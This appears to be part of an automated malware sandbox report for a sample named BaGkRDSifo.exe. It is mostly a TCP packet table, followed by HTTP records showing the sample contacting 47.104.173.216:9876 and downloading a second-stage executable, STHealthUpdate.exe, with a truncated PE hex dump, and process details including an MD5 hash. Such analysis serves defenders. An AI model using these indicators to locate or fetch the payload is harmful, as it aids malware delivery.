May 27, 2024 15:23:02.429678917 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.429686069 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.484610081 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.656200886 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656250000 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656265020 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656280041 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656297922 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656313896 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656331062 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656403065 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.656934977 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.656985998 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.656987906 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.657022953 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.657057047 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.657066107 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.657092094 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.657138109 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.657808065 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.657841921 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.657877922 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.657895088 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.703387022 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.754442930 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.797138929 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.883873940 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.883924961 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.883955956 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.883990049 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.883995056 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.884026051 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884035110 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.884059906 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884094000 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884134054 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.884668112 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884721994 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.884797096 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884830952 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884865999 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884885073 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.884900093 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884934902 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.884943962 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.885628939 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.885684013 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.885685921 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.885715961 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.885754108 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.885840893 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.886332035 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.886365891 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.886384010 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.886400938 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.886434078 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:02.886451006 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:02.937767029 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.144804001 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.144853115 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.144891977 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.144926071 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.145127058 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145159960 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145181894 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.145195961 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145246983 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.145317078 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145350933 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145382881 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145397902 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.145421028 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145472050 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.145910978 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145945072 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.145978928 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146002054 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.146013975 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146064997 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.146147013 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146197081 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146248102 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146255016 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.146281958 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146313906 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146337986 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.146348000 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146380901 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.146394014 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.148017883 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.148051023 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.148085117 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.148087978 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.148117065 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.148132086 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.148150921 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.148183107 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.148196936 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.148216009 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.148272038 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.149224997 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.149440050 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.149583101 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.400639057 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400685072 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400713921 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400732040 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400752068 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.400755882 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400774002 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400789976 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400798082 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.400806904 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400820971 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.400825024 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.400861025 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.401025057 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401078939 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.401082993 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401099920 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401144981 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.401169062 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401372910 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401390076 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401406050 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401422024 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401422024 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.401439905 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.401458025 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.401487112 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.401978016 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402017117 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402076960 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.402117968 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402132988 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402148008 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402164936 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402180910 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.402183056 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402199030 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402214050 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.402247906 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.402895927 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402910948 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402929068 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402952909 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402961969 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.402970076 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.402983904 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403001070 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403003931 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.403017998 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403022051 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.403033972 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403068066 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.403809071 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403860092 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.403920889 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403938055 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403954983 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403978109 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403995037 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.403996944 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.404012918 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.404027939 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.404027939 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.404045105 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.404057026 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.404093981 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.404872894 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405003071 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405019045 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405035019 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405050993 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.405056953 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405071974 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.405076981 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405093908 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405108929 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405123949 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.405124903 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.405170918 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.406582117 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.406645060 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.622528076 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622566938 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622584105 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622600079 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622617960 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622625113 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.622634888 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622652054 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622663021 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.622669935 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.622680902 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.622720003 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.623059034 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623085976 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623102903 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623132944 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.623182058 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623229027 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.623334885 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623408079 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623424053 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623450994 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.623460054 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623483896 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623501062 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.623502016 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623517036 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623533964 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623545885 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.623549938 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.623584986 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624005079 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624059916 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624062061 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624097109 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624131918 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624145985 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624165058 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624214888 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624391079 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624452114 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624499083 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624504089 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624538898 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624572039 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624584913 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624608040 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624640942 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624653101 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624675035 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624708891 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624721050 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.624743938 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624838114 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.624845982 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.625296116 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625346899 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.625351906 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625403881 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625457048 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625457048 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.625507116 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625541925 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625555038 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.625575066 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625608921 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625622988 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.625643015 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625678062 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625694990 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.625714064 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.625763893 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.626218081 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.626271009 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.626319885 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.626322031 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.626357079 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.626389027 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.626401901 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.626425028 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.626454115 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.626470089 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.627564907 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627619982 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627623081 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.627654076 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627688885 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627701044 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.627758980 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627811909 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627811909 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.627846003 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627893925 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.627899885 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627933979 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627968073 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.627979994 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.628000021 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.628034115 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.628057957 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.628066063 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.628101110 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.628113031 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.628135920 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.628180981 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:23:03.628684998 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:23:03.672128916 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:24:43.641977072 CEST	49701	9876	192.168.2.7	47.104.173.216
May 27, 2024 15:24:43.826262951 CEST	9876	49701	47.104.173.216	192.168.2.7
May 27, 2024 15:24:43.826323032 CEST	49701	9876	192.168.2.7	47.104.173.216

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
May 27, 2024 15:23:00.388600111 CEST	192.168.2.7	47.104.173.216	4d5a		Echo
May 27, 2024 15:23:00.568905115 CEST	47.104.173.216	192.168.2.7	555a		Echo Reply

HTTP Request Dependency Graph

47.104.173.216:9876

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49701	47.104.173.216	9876	180	C:\Users\user\Desktop\BaGkRDSifo.exe

Timestamp	Bytes transferred	Direction	Data
May 27, 2024 15:23:00.637504101 CEST	79	OUT	GET /server.txt HTTP/1.1 Host: 47.104.173.216:9876 Connection: Keep-Alive
May 27, 2024 15:23:01.572685003 CEST	259	IN	HTTP/1.1 200 OK Content-Type: text/plain Last-Modified: Mon, 27 May 2024 11:11:23 GMT Accept-Ranges: bytes ETag: "b1415f9c26b0da1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 27 May 2024 13:23:01 GMT Content-Length: 12 Data Raw: 33 2e 32 34 2e 30 35 2e 32 37 2e 35 Data Ascii: 3.24.05.27.5
May 27, 2024 15:23:01.644777060 CEST	63	OUT	GET /STHealthUpdate.exe HTTP/1.1 Host: 47.104.173.216:9876
May 27, 2024 15:23:01.973798037 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Mon, 27 May 2024 11:10:41 GMT Accept-Ranges: bytes ETag: "f599508326b0da1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET Date: Mon, 27 May 2024 13:23:01 GMT Content-Length: 243200 Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 10 84 2d 2c 71 ea 7e 2c 71 ea 7e 2c 71 ea 7e 32 23 7f 7e 3f 71 ea 7e 0b b7 91 7e 2b 71 ea 7e 2c 71 eb 7e 5c 71 ea 7e 32 23 6e 7e 1c 71 ea 7e 32 23 69 7e a2 71 ea 7e 32 23 7b 7e 2d 71 ea 7e 52 69 63 68 2c 71 ea 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 dd 69 54 66 00 00 00 00 50 45 00 00 4c 01 04 00 74 a5 00 50 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 98 01 00 00 1a 02 00 00 00 00 00 2f cd 00 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 fb 3b 02 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$h-,q~,q~,q~2#~?q~~+q~,q~\q~2#n~q~2#i~q~2#{~-q~Rich,q~iTfPELtP#/@;P`@.text `.rdatamn@@.data0 @.rsrc` @@

Target ID:	0
Start time:	09:22:57
Start date:	27/05/2024
Path:	C:\Users\user\Desktop\BaGkRDSifo.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\BaGkRDSifo.exe"
Imagebase:	0x400000
File size:	3'972'096 bytes
MD5 hash:	3B8F605388479CD9296E0BE1EA9D1F60
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
